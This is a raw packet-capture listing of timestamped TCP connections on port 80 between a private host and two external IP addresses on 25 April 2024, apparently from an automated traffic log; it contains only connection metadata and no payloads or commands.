Apr 25, 2024 12:16:09.587212086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587250948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587279081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587384939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587429047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587447882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587471008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587507010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587522984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587538004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587610006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587629080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587641954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587698936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587702036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587726116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587750912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587750912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587794065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587806940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587837934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587865114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587886095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587892056 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.587919950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.587985992 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.825840950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.825889111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.825928926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.825965881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826003075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826035023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826035023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826098919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826136112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826173067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826194048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826208115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826246023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826263905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826334953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826365948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826371908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826462030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826498032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826512098 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826535940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826570988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826586962 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826622963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826659918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826680899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826697111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826731920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826752901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826769114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826806068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826826096 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826842070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826879025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826886892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.826948881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.826999903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827018976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827086926 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827089071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827126980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827162981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827212095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827231884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827267885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827306032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827323914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827342987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827379942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827393055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827415943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827435017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827451944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827522039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827559948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827595949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827608109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827608109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.827631950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:09.827929974 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:09.972093105 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 12:16:10.065133095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065193892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065237045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065272093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065283060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065320969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065357924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065362930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065396070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065411091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065431118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065468073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065505028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065521955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065541029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065576077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065601110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065617085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065644979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065664053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065704107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065742016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065757036 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065773964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065790892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065809011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065851927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065853119 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065874100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065913916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.065927982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.065968037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066035986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066057920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066076994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066097021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066129923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066149950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066205025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066237926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066253901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066286087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066323996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066335917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066387892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066437960 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066472054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066499949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066535950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066581011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066622972 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066649914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066688061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066731930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066757917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066775084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066824913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.066847086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066883087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066922903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066965103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.066970110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067011118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067017078 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067040920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067054987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067112923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067122936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067136049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067163944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067173004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067183018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067262888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067270041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067320108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067341089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067353010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067399979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067411900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067457914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067471981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067491055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067514896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067537069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067580938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067614079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067626953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067652941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067697048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067765951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067768097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067780972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067794085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067847013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067862034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067874908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067924976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067938089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.067941904 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.067986012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.068006992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068058968 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.068063974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068078041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068089962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068130016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.068139076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068214893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068227053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068259954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068272114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.068272114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.068276882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068299055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068324089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.068346977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068371058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068393946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.068401098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.068454981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.180064917 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 12:16:10.180160999 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 12:16:10.180352926 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 12:16:10.304428101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304666996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304685116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304702044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304718971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304737091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304749966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.304749966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.304753065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304770947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304780006 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.304786921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304805040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304819107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.304821968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304869890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304883957 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.304887056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304934025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.304939985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.304966927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305020094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305035114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305037022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305083990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305095911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305162907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305188894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305217028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305233955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305262089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305303097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305351973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305356026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305372953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305411100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305414915 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305442095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305500984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305501938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305566072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305583000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305625916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305643082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305672884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305672884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305707932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305727005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305742979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305773973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305773973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305797100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305804014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305883884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305912018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.305953026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.305969954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306006908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306006908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306037903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306083918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306090117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306107998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306132078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306176901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306176901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306194067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306252956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306269884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306308985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306334972 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306360006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306365967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306430101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306447983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306504011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306540966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306545973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306588888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306596994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306626081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306662083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306700945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306767941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306785107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306821108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306821108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306849003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306865931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306946039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.306960106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.306963921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307027102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307032108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307049990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307080984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307091951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307097912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307115078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307136059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307157040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307173014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307204008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307241917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307260990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307270050 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307307959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307358980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307358980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307375908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307416916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307431936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307434082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307482958 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307497978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307528019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307544947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307570934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307593107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307620049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307635069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.307663918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.307713985 CEST	49733	80	192.168.2.4	176.97.76.106
